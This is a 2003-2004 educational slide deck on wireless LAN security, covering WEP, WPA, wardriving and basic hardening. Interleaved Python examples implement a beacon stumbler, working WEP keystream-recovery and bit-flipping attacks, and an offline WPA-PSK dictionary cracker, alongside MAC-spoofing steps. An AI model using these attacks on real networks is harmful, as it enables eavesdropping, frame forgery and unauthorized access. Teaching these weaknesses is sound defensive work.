Wireless LAN INsecurity 2003
Wireless LAN INsecurity 2004
Robert C. Jones, M.D.
LtCol, USAF, Medical Corps
Staff Anesthesiologist
Andrews Air Force Base, Maryland
E-mail: [email protected]
Web site: http://www.notbob.com
Copyright (C) 2004 Robert C. Jones, M.D. All Rights Reserved.
CIA XXIV
Disclaimer: Fair Use of Online Resources
FAIR USE NOTICE: This contains copyrighted material, which is reproduced
under the Fair Use Provision of Title 17, U.S.C. Section 107, and is posted for
purposes such as criticism, comment, news reporting, teaching, scholarship, or
research. This material is posted without profit for the benefit of those who, by
accessing this material, are expressing a prior interest in this information for
research and educational purposes.
In order to educate health care providers and other professionals, this presentation contains graphics and information obtained on the internet which may be copyrighted
According to Sections 107 and 504c of United States Code title 17, this material is considered to be “fair use” of copyrighted intellectual property; it is to be used for noncommercial purposes only
“Fair Use” is the use of a copyrighted work for purposes such as criticism, comment, news reporting, teaching (including multiple copies for classroom use), scholarship, or
research.
In determining whether the use made of a work in any particular case is a fair use, the factors to be considered shall include:
– The purpose and character of the use, including whether such use is of a commercial nature or is for nonprofit educational purposes;
– The nature of the copyrighted work;
– The amount and substantiality of the portion used in relation to the copyrighted work as a whole; and
– The effect of the use upon the potential market for or value of the copyrighted work.
The purpose and character of this presentation is for nonprofit educational purposes in support of Homeland Defense and internet security; the nature of the copyrighted work
is individual graphics and quotes; the amount and substantiality of the portion used is minimal; and the effect on the potential market for or value of the copyrighted use is
negligible. In fact, the hyperlink references crediting the original sources should increase the market value of said copyrighted works by increasing traffic to the websites
presenting this material.
This presentation was produced in the United States Air Force medical environment in the interest of academic freedom and the advancement of national defense-related
concepts. The views expressed in this presentation and linked-to material are those of the author(s) of said material and do not reflect the official policy or position of the U.S.
Air Force, Department of Defense, the United States government, or the AOMPS. Nor do educational links to internet websites or reference sources constitute any kind or
degree of verification or validation of information presented therein. Nobody paid me squat to write this stuff, by the way
Point of Contact for questions regarding copyright infringement shall be the current U.S. Department of Defense designated agent to receive notification of claimed DMCA
copyright infringement (courtesy of Department of Redundancy Department [DoRD])
Financial Disclosure: I am a Microsoft shareholder, so I can parody and provide commentary upon the products and services of the Microsoft Corporation with impunity
"We came across a company with one of these wireless
networks. All their source code, everything was
available. This network was beaconing, 'log onto me'...
It basically had its Rolls-Royce parked in the driveway,
engine running, with a sign saying 'steal me.' "
-- Thubten Comberford of White Hat Technologies, a
wireless security firm.
http://www.wirelessdevnet.com/articles/80211security/
Wireless INSecurity in the News
http://www.wral.com/technology/2465963/detail.html
Wireless INSecurity is Big Business
$100.00 per page…Think what a bargain this lecture is!
The Basic Network Security Pyramid
Wireless Security 2003
What this talk is about
Introduction to Wireless LAN (WLAN) tech
Overview of Wireless vs. Wired network security
Risks of specific WLAN technologies
Wardriving 101
Securing WLAN Communications
Future WLAN Security Issues
References
You can’t afford perfect security
“The only secure computer is one that is
unplugged, locked in a secure vault that
only one person knows the combination
to, and that person died last year.”
Eckel, G and Steen, W., Intranet Working, New Riders, 1996, p. 419
What this talk is NOT about
Cellular communication technology
GSM, CDMA, 2G, 2.5G, 3G, 4G…
Uncommon alternatives to Wired LANs
Powerline technology, IR, laser, Avian IP
How to hack the airwaves for fun & profit
How to ensure 100% WLAN security
AFH* Topics: TEMPEST, HAARP, ECHELON
*Aluminum Foil Hat
This Talk Is Not For You If:
http://www.geocities.com/Area51/Dreamworld/1799/UNnwo2.html
Introduction to Wireless vs. Wired Networking
Wired Networking
Inexpensive infrastructure (CAT5 cable + NICs)
Expensive deployment (drilling through walls)
Reconfiguring network topology difficult
Difficult (not impossible!) to intercept communication
Worldwide exposure to intruders if connected to Net
Fast! (10/100 Mbps Ethernet, Gigabit Ethernet…)
Negligible interference from environment
Basic Wired Network Topology
[diagram: wired clients, Router, Firewall, internet]
Introduction to Wireless vs. Wired Networking
Wireless Networking
Expensive infrastructure (clients + APs = cha-ching!)
Inexpensive deployment (protocols supported in OSes)
Reconfiguring network topology trivial (?too trivial?)
Ridiculously easy to intercept communication
Geographically constrained exposure to intruders*
Relatively slow ("11 Mbps" marketingspeak = ~5 Mbps real throughput)
Massive environmental interference (ISM, path loss)
*ad hoc intranetworks
Basic Wireless Network Topology: Infrastructure Mode (using AP)
[diagram: wireless clients, Access Point, Firewall, wired net]
Advantages: AP security; isolated net connection
Disadvantages: AP cost, complexity; broadcast range
Basic Wireless Network Topology: P2P Ad Hoc Networks
[diagram: wireless clients talking directly to each other with no AP; Firewall on the wired side]
Advantages: no addt'l hardware; geographically constrained
Disadvantages: unmanaged P2P net issues; geo. constrained
STA 2003
Basic WLAN Discovery
Beacon mode (default for 802.11b): the AP transmits a beacon about 10 times per second (default beacon interval 100 TU ≈ 102 ms) containing the SSID in clear text plus info regarding security support by the AP (WEP, 802.1X, etc.)
Beacon mode shut off: the station (STA) sends a probe request with SSID = blank or "any"; many APs answer with a probe response containing the valid SSID
Caveat: even an AP that ignores blank probes still sends its SSID in clear text in probe responses to, and receives it in association requests from, its legitimate clients. "Hiding" the SSID only delays a sniffer; it is not access control
Basic WLAN Authentication & Association
Authentication: process of verifying the credentials of a client asking to join a WLAN
Association: process of connecting a client to a given AP in the WLAN
802.11 standard specifies 3 states:
Unauthenticated + Unassociated
Authenticated + Unassociated
Authenticated + Associated
Authentication
Default: Open System authentication (+/- MAC/SSID filtering): STA "give me access" → AP "granted" (no credential is checked at all)
Shared Key authentication (WEP): STA "give me access" → AP sends authentication challenge (128 random bytes) → STA returns the challenge WEP-encrypted (authentication response) → AP "granted"
Caveat: the challenge and its encrypted reply both cross the air, so an eavesdropper gets plaintext XOR ciphertext = the RC4 keystream for that IV, and can then pass the same authentication (and forge frames under that IV) without ever learning the key. Shared Key authentication is weaker than Open System plus WEP encryption of the data
Generic Wireless Security Exploits
Physical Theft
Eavesdropping
Data Modification
Identity Spoofing/Masquerading
Denial of Service (DoS)
Let’s Get Physical
Physical theft of laptop/PDA 3rd most common
network security threat facing businesses (2003)
Laptop = Expensive; Proprietary Data = Priceless
No one is immune (FBI; DEA; IRS; State
Department; Qualcomm CEO…)
Theft of proprietary data #1 cause of financial loss
by corporations
References: State Dept.: http://www.computerworld.com/governmenttopics/government/legalissues/story/0,10801,54791,00.html
FBI/DEA/IRS: http://www.nwfusion.com/newsletters/sec/2002/01514404.html
Qualcomm CEO: http://zdnet.com.com/2100-11-523990.html?legacy=zdnn
[chart] Source: http://www.gocsi.com/awareness/fbi.jhtml
Generic Wireless Network Exploits
Physical Theft (Before / After)
[diagrams: Firewall, Access Point, wireless client; before and after the client is stolen]
Generic Wireless Network Exploits
Eavesdropping Case 1: Wardriving
[diagram: Firewall, Access Point; wardriver's car outside picking up the signal: "Gotcha!"]
Generic Wireless Network Exploits
Eavesdropping Case 2: Office Building
[diagram: Firewall, Access Point; other tenants of the same building within range: Tabloid, Terrorist, Your Competitor]
Generic Wireless Network Exploits
Eavesdropping Case 3: Rogue APs
[diagram: Firewall, Access Point, and a Rogue Access Point plugged into the wired network behind the Firewall]
Generic Wireless Network Exploits
Eavesdropping Case 4: P2P Ad Hoc Networks
[diagram: Firewall bypassed by wireless clients via:]
• Insecure connection to outside APs
• Insecure modem connection
• Unwise placement
• High-power client
• Unauthorized antenna
The 100 meter myth
Increasingly powerful 802.11x clients available
200 mW PCMCIA cards advertise 6000+ ft range
http://products.wi-fiplanet.com/wifi/pc_card_16-bit/1058052117.html
Most WiFi® adapters have external antenna
connections; even homemade antennas work well
Generic Wireless Network Exploits
Data Modification (Man in the Middle Attack)
[diagram: Alice, Firewall, Access Point, Bob; attacker "Cats" sits in the middle and can Listen, Read, Corrupt, Forge, Send]
Alice sends "Need project Chortle now!"; Bob receives "Meeting postponed; go home early"
Ref: Edney J, Arbaugh WA, Real 802.11 Security, pp. 37-40
Generic Wireless Network Exploits
Identity Spoofing
[diagram: Alice and Bob behind Firewall and Access Point; legitimate client: MAC Address 0000deadbeef, SSID default; attacker "Cats" outside with spoofed MAC Address 0000deadbeef, SSID default: "Looks like your company's IP to the FBI!"]
Generic Wireless Network Exploits
Denial of Service (DoS)
[diagram: Firewall, Access Point drowned out by: microwave oven, 2.4 GHz cell phone, Bluetooth device, 2.4 GHz jammer]
Also protocol-level DoS: 802.11-1999 management frames are not authenticated, so anyone in range can forge deauthentication/disassociation frames and knock every client off the AP, no jammer required
Risks of Specific WLAN technologies
802.11x/WiFiTM
ISM vulnerability
MAC/SSID authentication insecurity
WEP insecurity
Bluetooth
HIPERLAN/2 (Europa: ETSI*)
HiSWAN (日本: MMAC†)
*European Telecommunications Standards Institute: http://www.hiperlan.uk.com/pages/hiperlan.htm
†Multimedia Mobile Access Communication: http://www.arib.or.jp/mmac/e/
IEEE 802.11 Risks
ISM: Industrial, Scientific, and Medical spectrum
Not reserved: an unlicensed band (FCC Part 15 in the USA), shared with anything else that radiates there
Long list of things that cause interference in the 2.4 GHz range:
2.4 GHz cell phones/portable phones
Microwave ovens
Stained glass windows
Portable jammers (illegal in USA)
MAC/SSID Vulnerability
MAC = media access control address
Hardcoded in all NICs
Easily spoofed (Win 9x, Linux; harder on WinXP, where it depends on the driver exposing a "Network Address" property)
SSID = Service Set Identifier
Used to define networks
By default, broadcast by access points
Will be given out by many APs if client configured with "any" or blank SSID
Neither is a credential: a MAC filter is defeated by sniffing an allowed client's MAC and spoofing it, and the SSID is sent in clear text by every client that associates
Default SSIDs
3Com: comcomcom
Cisco: 2, tsunami, WaveLAN Network
Compaq: Compaq
DLink: WLAN
Intel: 101, 195, xlan, intel
Linksys: linksys, Wireless
Netgear: Wireless
Zcomax: any, mello, Test
With AP manufacturer known, trivial to determine default Administrator username/password!
http://www.cirt.net/cgi-bin/ssids.pl
http://www.iss.net/wireless/WLAN_FAQ.php
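What a stumbler actually does with the beacons, SSIDs and capability bits described above, as an added example (not NetStumbler's, Kismet's or any vendor's code): it parses 802.11 beacon frames, pulls out BSSID, SSID, channel and the Privacy/WPA/RSN flags, and reports the findings a wardriver sees first. The frames, BSSIDs and the "k7x-guest" network are constructed; DEFAULT_SSIDS is the table above. One frame has a truncated information element on purpose, to show the parser stopping cleanly instead of crashing on a malformed capture.

```python
"""Mini stumbler: parse 802.11 beacons and flag the low-hanging fruit
(open APs, WEP-only APs, default SSIDs). Added example; frames are constructed."""
import struct

# Default SSIDs from the table above, lower-cased for matching.
DEFAULT_SSIDS = {s.lower() for s in (
    "comcomcom", "2", "tsunami", "WaveLAN Network", "Compaq", "WLAN",
    "101", "195", "xlan", "intel", "linksys", "Wireless", "any", "mello", "Test",
)}

CAP_ESS = 0x0001      # capability bit: infrastructure (AP) network
CAP_PRIVACY = 0x0010  # capability bit: WEP/WPA required on data frames
WPA_OUI_TYPE = b"\x00\x50\xf2\x01"  # vendor-specific IE that carries pre-802.11i WPA


def ie(tag: int, value: bytes) -> bytes:
    """One information element: tag, length, value."""
    return bytes((tag, len(value))) + value


def build_beacon(bssid: bytes, ssid: bytes, channel: int, privacy: bool,
                 wpa: bool = False, rsn: bool = False, interval_tu: int = 100) -> bytes:
    """Construct a beacon: 24-byte MAC header, 12 bytes of fixed fields, then IEs."""
    fc = b"\x80\x00"                                   # type=management, subtype=beacon
    header = fc + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    cap = CAP_ESS | (CAP_PRIVACY if privacy else 0)
    fixed = struct.pack("<QHH", 0, interval_tu, cap)  # timestamp, beacon interval, capability
    body = ie(0, ssid) + ie(1, b"\x82\x84\x8b\x96") + ie(3, bytes((channel,)))
    if wpa:
        body += ie(221, WPA_OUI_TYPE + b"\x01\x00")   # WPA IE, version 1 (rest omitted)
    if rsn:
        body += ie(48, b"\x01\x00")                   # RSN IE, version 1 (rest omitted)
    return header + fixed + body


def parse_beacon(frame: bytes) -> dict:
    """Return what a stumbler shows: BSSID, SSID, channel, privacy/WPA/RSN flags."""
    if len(frame) < 36 or (frame[0] & 0xFC) != 0x80:
        raise ValueError("not a beacon frame")
    bssid = ":".join(f"{b:02x}" for b in frame[16:22])
    body = frame[24:]
    _timestamp, interval_tu, cap = struct.unpack_from("<QHH", body, 0)
    ies, wpa, off = {}, False, 12
    while off + 2 <= len(body):                  # walk the tag/len/value list
        tag, length = body[off], body[off + 1]
        value = body[off + 2:off + 2 + length]
        if len(value) < length:                  # truncated IE: stop, keep what we have
            break
        if tag == 221 and value.startswith(WPA_OUI_TYPE):
            wpa = True
        else:
            ies[tag] = value
        off += 2 + length
    raw_ssid = ies.get(0, b"")
    hidden = len(raw_ssid) == 0 or raw_ssid == bytes(len(raw_ssid))  # empty or all-NUL
    return {
        "bssid": bssid,
        "ssid": None if hidden else raw_ssid.decode("utf-8", "replace"),
        "hidden": hidden,
        "channel": ies[3][0] if ies.get(3) else None,
        "beacon_ms": round(interval_tu * 1.024, 1),  # 1 TU = 1024 us; 100 TU is ~10 Hz
        "privacy": bool(cap & CAP_PRIVACY),
        "wpa": wpa,
        "rsn": 48 in ies,
    }


def assess(info: dict) -> list:
    """Findings in the spirit of the checklist later in the talk."""
    findings = []
    if not info["privacy"]:
        findings.append("open: no WEP/WPA at all")
    elif not (info["wpa"] or info["rsn"]):
        findings.append("WEP only: crackable, upgrade to WPA")
    if info["ssid"] is not None and info["ssid"].lower() in DEFAULT_SSIDS:
        findings.append("default SSID: vendor (and admin password) guessable")
    return findings


def survey(frames) -> dict:
    """Map BSSID -> (parsed info, findings) for a batch of captured beacons."""
    out = {}
    for frame in frames:
        try:
            info = parse_beacon(frame)
        except ValueError:
            continue                             # not a beacon; a stumbler just skips it
        out[info["bssid"]] = (info, assess(info))
    return out


SAMPLE_FRAMES = [  # constructed sample input, not real captures
    build_beacon(b"\x00\x06\x25\x11\x22\x33", b"linksys", 6, privacy=False),
    build_beacon(b"\x00\x40\x96\x44\x55\x66", b"tsunami", 1, privacy=True),
    build_beacon(b"\x00\x02\x2d\x77\x88\x99", b"", 11, privacy=True, wpa=True),
    # last byte chopped off: the RSN IE is truncated, parser must cope
    build_beacon(b"\x00\x0c\x41\xaa\xbb\xcc", b"k7x-guest", 6, privacy=True, rsn=True)[:-1],
]

if __name__ == "__main__":
    for bssid, (info, findings) in survey(SAMPLE_FRAMES).items():
        print(bssid, info["ssid"] or "<hidden>", "ch", info["channel"], findings)
```

Feed it the beacons from a real capture (any sniffer that hands you raw 802.11 management frames) and the output is the same kind of list NetStumbler shows, minus the signal strength.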
WEP…what is WEP?
Wired Equivalent Privacy (NOT "Wireless Encryption Protocol" or "Wireless Equivalent Privacy")
First defined in 1999 ANSI/IEEE Std. 802.11, section 8.2
http://standards.ieee.org/getieee802/download/802.11-1999.pdf
Never intended to provide strong security; Goals:
"Reasonably strong" (dependent on key length)
"Self-synchronizing" (for "best effort" delivery)
"Efficient" (low processor overhead)
"Exportable" (pre-1999 ITAR climate [Phil Zimmermann])
"Optional" (so lusers don't whine to hardware manufacturers when they mess up WEP on their networks; DISABLED out of the box by all OEMs as of 2003 AFAIK*)
*AFAIK = As far as I know
Encryption Basics
[figure: XOR logic gate and truth table]
Need to hide message (plaintext) = needle
Generate random stuff (encryption key) = piece of hay
Stretch the key into a long pseudorandom sequence (keystream) = haystack
Hide message in haystack: plaintext XOR keystream = ciphertext; the receiver XORs with the same keystream and gets the plaintext back
http://www.mesda.com/files/infosecurity200309.pdf; http://hyperphysics.phy-astr.gsu.edu/hbase/electronic/xor.html
Intro to Encryption: http://home.ecn.ab.ca/~jsavard/crypto/jscrypt.htm
How is WEP supposed to work?
• Secret key (40 or 104 bits) combined with a 24-bit IV, run through the WEP cipher PRNG (RC4) to produce a keystream
• Plaintext plus a CRC-32 integrity check value (ICV) XORed with the keystream (not reversible without the keystream, i.e. the key)
• IV sent in the clear, followed by the ciphertext, in the body of the 802.11 frame; whatever the frame carries (IP packets, etc.) is what gets encrypted
http://standards.ieee.org/getieee802/download/802.11-1999.pdf
What is RC4?
One encryption algorithm (many others: DES, IDEA, Blowfish, AES, etc.)
Efficient stream cipher (low overhead): used in SSL encryption (online banking, etc.)
Proprietary trade secret of RSA Data Security, Inc. http://www.rsasecurity.com (the name RC4 is their trademark, hence "ARC4"/"ARCFOUR" for the clones)
Presumed RC4 source code uploaded to Usenet newsgroup sci.crypt 13 Sep 1994; all open source RC4 implementations (including the ones inside WEP drivers and WEP cracking tools) descend from this anonymous post!
From: [email protected] (An0nYm0Us UsEr)
Newsgroups: sci.crypt
Subject: RC4 ?
Date: 13 Sep 1994 21:30:36 GMT
Organization: Global Anonymous Remail Services Ltd.
Lines: 83
Message-ID: <[email protected]>
NNTP-Posting-Host: xs1.xs4all.nl
X-Comment: This message did not originate from the above address.
X-Comment: It was automatically remailed by an anonymous mailservice.
X-Comment: Info: [email protected], Subject: remailer-help
X-Comment: Please report inappropriate use to <[email protected]>
SUBJECT: RC4 Source Code
I've tested this. It is compatible with the RC4 object module
that comes in the various RSA toolkits.
/* rc4.h */
http://groups.google.com/groups?selm=35gtd7%24404%40ccu2.auckland.ac.nz&oe=UTF-8&output=gplain
Why is WEP Broken?
First paper: Fluhrer, Mantin, Shamir (RC4 key-scheduling flaws) http://www.securityfocus.com/data/library/rc4_ksaproc.pdf
WEP attack using FMS method: Stubblefield, Ioannidis, Rubin http://www.cs.rice.edu/~astubble/wep/
WEP standard uses RC4 improperly http://www.rsasecurity.com/rsalabs/node.asp?id=2009
Flaws in key scheduling algorithm → large number of weak (IV, key) combinations → passively sniffing a few million frames recovers the key
IV is sent in the clear with each frame: subtract 24 bits of IV from the advertised key length (64-bit WEP = 40-bit key; 128-bit WEP = 104-bit key)
Only 2^24 IVs exist and the standard does not say how to choose them, so keystreams repeat; XOR two frames sent under the same IV and the keystream cancels out
ICV is plain CRC-32 (linear), so bits in an encrypted frame can be flipped and the ICV patched to match without knowing the key
http://wombat.doc.ic.ac.uk/foldoc/foldoc.cgi?RC4
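The mechanics above, as an added example that is not the standard's own code: RC4 keyed with IV || secret, the CRC-32 ICV, and the two failures that need no key at all, keystream reuse when an IV repeats and bit-flipping past the linear ICV. The 40-bit key, the IV and the Alice/Bob messages are constructed; the RC4 routine is the algorithm from the sci.crypt post.

```python
"""WEP as the 802.11-1999 text describes it, plus two reasons it fails.
Added example with constructed data, not code from the standard or a driver."""
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4: key-scheduling (KSA) then pseudo-random generation (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                                # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):                             # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (3 bytes, in clear) || RC4(IV || secret) XOR (plaintext || ICV).
    '64-bit WEP' is this 40-bit secret plus the 24-bit IV; only 40 bits are secret."""
    assert len(iv) == 3
    keystream = rc4_keystream(iv + secret, len(plaintext) + 4)
    return iv + xor(plaintext + icv(plaintext), keystream)


def wep_decrypt(secret: bytes, frame: bytes):
    """Return the plaintext, or None if the ICV does not verify."""
    iv, body = frame[:3], frame[3:]
    decrypted = xor(body, rc4_keystream(iv + secret, len(body)))
    plaintext, tag = decrypted[:-4], decrypted[-4:]
    return plaintext if icv(plaintext) == tag else None


def recover_from_iv_reuse(known_frame: bytes, known_plaintext: bytes,
                          target_frame: bytes) -> bytes:
    """Same IV means same keystream, so C1 XOR C2 = P1 XOR P2. One known plaintext
    gives the keystream prefix, which decrypts any other frame under that IV.
    No key needed; with only 2^24 IVs a busy AP repeats them within hours."""
    assert known_frame[:3] == target_frame[:3], "attack needs a repeated IV"
    keystream = xor(known_frame[3:], known_plaintext)   # keystream prefix
    target_len = len(target_frame) - 3 - 4              # strip IV and ICV
    return xor(target_frame[3:3 + target_len], keystream[:target_len])


def flip_bits(frame: bytes, offset: int, delta: bytes) -> bytes:
    """Change ciphertext so it decrypts to plaintext XOR delta and the ICV still verifies.
    CRC-32 is linear: crc(P ^ D) == crc(P) ^ crc(D) ^ crc(zeros), so the attacker XORs
    crc(D) ^ crc(zeros) into the encrypted ICV. Again no key needed."""
    body = frame[3:]
    n = len(body) - 4
    d = bytes(offset) + delta + bytes(n - offset - len(delta))  # delta padded to full length
    icv_delta = (zlib.crc32(d) ^ zlib.crc32(bytes(n))) & 0xFFFFFFFF
    return frame[:3] + xor(body, d + struct.pack("<I", icv_delta))


def demo():
    """Constructed walk-through using the talk's Alice/Bob messages."""
    secret = bytes.fromhex("0123456789")      # constructed 40-bit key
    iv = b"\x00\x00\x01"                      # the 24-bit IV the sender happened to pick
    p1 = b"Meeting postponed; go home early"
    p2 = b"Need project Chortle now!"
    c1 = wep_encrypt(secret, iv, p1)
    c2 = wep_encrypt(secret, iv, p2)          # IV reused: both frames share a keystream
    leaked = recover_from_iv_reuse(c1, p1, c2)
    off = p1.index(b"postponed")
    forged = wep_decrypt(secret, flip_bits(c1, off, xor(b"postponed", b"confirmed")))
    return leaked, forged


if __name__ == "__main__":
    leaked, forged = demo()
    print("recovered without the key:", leaked)
    print("forged frame that passed the ICV:", forged)
```

Neither attack touches RC4 itself; they come from how WEP wraps it (24-bit IV chosen per frame, no key mixing, linear checksum), which is exactly what TKIP's sequence counter, key mixing and Michael MIC were bolted on to fix.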
Quick Fix for WEP: WPA
WPA = "WiFi™ Protected Access"
Available as software/firmware upgrade for most chipsets/manufacturers now or soon
Subset of upcoming 802.11i security architecture
Patches major vulnerabilities in WEP:
TKIP fixes IV weakness (48-bit IV used as a sequence counter), adds MIC (Michael), per-packet key mixing, rekeying
Supports enterprise user authentication via EAP and 802.1X
SOHO mode: Pre-Shared Key (PSK): passphrase + SSID become the master key; per-session keys are derived and rotated for you
Caveat: with PSK, anyone who sniffs one client's handshake can test passphrase guesses offline, so a short or dictionary passphrase turns WPA back into low-hanging fruit; use a long random one
http://www.newswireless.net/articles/021123-protect.html
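What WPA-PSK ("SOHO mode") actually does with the passphrase, as an added example that is neither the WPA specification's nor any vendor's code: PBKDF2 turns passphrase + SSID into the master key (PMK), the handshake's PRF derives the per-session keys the slide calls autorotation, and a sniffed handshake lets an attacker test passphrase guesses offline against the frame's MIC. The MAC addresses, nonces, EAPOL frame body and wordlist are constructed stand-ins for a capture.

```python
"""WPA-PSK key derivation and the offline dictionary attack it permits.
Added example with a constructed handshake, not code from the WPA spec."""
import hashlib
import hmac
import os


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8-63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max of the two MAC
    addresses and of the two nonces). These are the per-session keys."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]                                   # KCK(16) | KEK(16) | TK(32)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key MIC of an EAPOL-Key frame under WPA/TKIP: HMAC-MD5 keyed with the KCK."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.md5).digest()


def capture_handshake(passphrase: str, ssid: str) -> dict:
    """Stand-in for sniffing message 2 of the 4-way handshake: everything a wardriver
    with a capture tool gets (MACs, nonces, EAPOL body, MIC). Constructed, not a pcap."""
    aa, spa = bytes.fromhex("000625112233"), bytes.fromhex("00022d778899")  # constructed MACs
    anonce, snonce = os.urandom(32), os.urandom(32)
    kck = ptk(wpa_psk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    eapol = b"\x01\x03\x00\x5f\xfe\x01\x09" + snonce + bytes(40)  # constructed body, MIC zeroed
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack(capture: dict, wordlist):
    """Offline dictionary attack: 4096 HMAC-SHA1 per guess, no further contact with the AP.
    Returns the passphrase that reproduces the captured MIC, or None."""
    for guess in wordlist:
        try:
            pmk = wpa_psk(guess, capture["ssid"])
        except ValueError:
            continue                                  # not a legal passphrase, skip
        kck = ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return guess
    return None


WORDLIST = ["password", "letmein1", "wireless", "linksys1", "summer2003", "qwerty123"]  # constructed

if __name__ == "__main__":
    print(crack(capture_handshake("summer2003", "linksys"), WORDLIST))        # weak: found
    print(crack(capture_handshake("Tq9!vR#2pLw0zX4m", "linksys"), WORDLIST))  # strong: None
```

Because the SSID is the PBKDF2 salt, a table of PMKs can be precomputed once for a default SSID such as linksys and reused against every AP that kept it; a unique SSID forces the attacker to start the 4096-round work over for your network, which is one more reason the checklist later in the talk says to change it.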
Risks of non-802.11x WLAN technologies
Bluetooth
Minimal security “out of the box”– need to RTFM
Security upgrade in B’tooth Spec. 1.2
http://www.itsecurity.com/tecsnews/jun2003/jun255.htm
Red Fang: Bluetooth device discovery tool from @Stake
(formerly L0pht Heavy Industries)– proof of concept; not very
practical http://www.kewney.com/articles/0300910-bluestake.html
References: http://www.webdesk.com/bluetooth-security-issues/; www.giac.org/practical/GSEC/Tu_Niem_GSEC.pdf
HIPERLAN/2
HiSWAN
HIPERLAN/2 and HiSWAN: Future Technologies for Future Talks
Technology needs to "hit the street" for serious security issues to arise
Wardriving 101
Definition: Mobile discovery of WLANs
Derived from term “wardialing”: automated dialing of
telephone numbers looking for modems (“Wargames”)
Related terms: Warwalking, warflying, warchalking…
NOT illegal in USA as of 2003: open ISM spectrum
HOWEVER, ethical wardrivers NEVER connect to the
networks they detect, let alone implant/steal data
therefrom (see Jeff Duntemann, Drive-by WiFi Guide)
http://www.paraglyphpress.com/pr02242003.php
Why Wardrive?
Fun: Sense of adventure a la 007
Informative: Teaches one about WLAN security
Cheap Hardware: Laptop + client +/- antenna +/- GPS
Free Software: Netstumbler, BSDAirtools, Airsnort…
Camaraderie: Group wardriving contests popular
31337 Hobby: In-crowd lingo (WEP, )(, tsunami)
Business tool: Audit your own network to improve
security/demonstrate insecurity to management
Wardriving Hardware
Old laptop with WLAN client +/- GPS
Pigtail: connects wireless card to antenna
Antenna: omnidirectional, magnetic mount, low profile best
[photo: http://www.wardriving.com/fiva.jpg; "Duško i Vlado prizivaju bežične signale" ("Duško and Vlado summon wireless signals"), http://www.monitor.hr/interview/ wireless.htm (in Croatian, from Zagreb)]
Wardriving Software
NetStumbler http://www.netstumbler.com/
MacStumbler http://www.macstumbler.com/
BSDAirtools http://www.dachb0den.com/projects/bsd-airtools.html
AirSnort http://airsnort.shmoo.com/
Kismet http://www.kismetwireless.net/
Wellenreiter http://www.wellenreiter.net/
Lots of other tools:
http://wardrive.net/wardriving/tools
Preparing for Safe and Ethical Wardrive
Use non-production box (old laptop), just in case
Change network ID to generic name (e.g., MSHOME, localhost)
Update client software/firmware
Uninstall TCP/IP from supported wireless card
Uninstall TCP/IP from integrated wireless (if any)
Spoof MAC address of wireless card (driver-dependent in XP)
Delete preferred networks (XP): Control Panel | Network | Card | Properties | Wireless Networks | Preferred Networks; disable prior to wardrive to prevent autoconnection to discovered APs
MAC Address Spoofing
[screenshot: Orinoco Gold on Win 98SE (YMMV RTFM HTH)]
Red Hat Linux (quoted from http://groups.google.com/groups?selm=bb8vft%24lma%241%40news01.intel.com&oe=UTF-8&output=gplain):
edit /etc/sysconfig/network-scripts/ifcfg-eth0 (assuming it's your eth0 network card that you want to change the MAC for), and add a line like this: MACADDR=AA:BB:CC:DD:EE:FF (Obviously you want to substitute the MAC address you want in place of AA:BB:CC:DD:EE:FF) Then "/sbin/ifdown eth0", "/sbin/ifup eth0", and you should be up and running with the new MAC address. You can use "/sbin/ifconfig eth0" to verify that the new MAC address is in effect -- it shows up in the 'HWaddr' entry on the first line that ifconfig prints
Conducting Safe and Ethical Wardrive
Read up on local/national laws before you set out
Be careful with pigtails– fragile!
Put laptop in back of car (behind driver) to prevent
distraction (local laws against watching TV, etc. +
common sense safety measure)
Drive during day– no suspicious eerie glow
Optimum speed around 30 MPH
Screenshots: shift|print screen or graphics program
(PaintShop Pro, etc.); stop car safely if alone
PSP8: http://www.jasc.com
Results of a “WarSit™” in San Francisco
Wardriving + GPS
http://www.netstumbler.com/nation.php
Here there be Warchalkers
Mainly mythical meme
Originated by Matthew D. Jones, Ph.D.
Open node symbolized by )(
)( Often used as 31337 shorthand for
wardriving
Don’t Warchalk: the world has enough
graffiti
http://www.blackbeltjones.com/warchalking/warchalking0_9.pdf
The Basics to Do Now
Pay attention to geographical location of AP (parking lot coverage)
Disable file & print sharing if not needed; never share root
Disable SSID broadcasting (default = enabled for most products); this hides you from casual stumblers only, since the SSID still crosses the air in clear text whenever a client associates
Change the SSID to something non-default which says nothing about you or network (boring = good; Smithfamilydiamonds = bad)
Upgrade firmware of AP/client to increase security (WPA)
Change default administrator login/password for AP
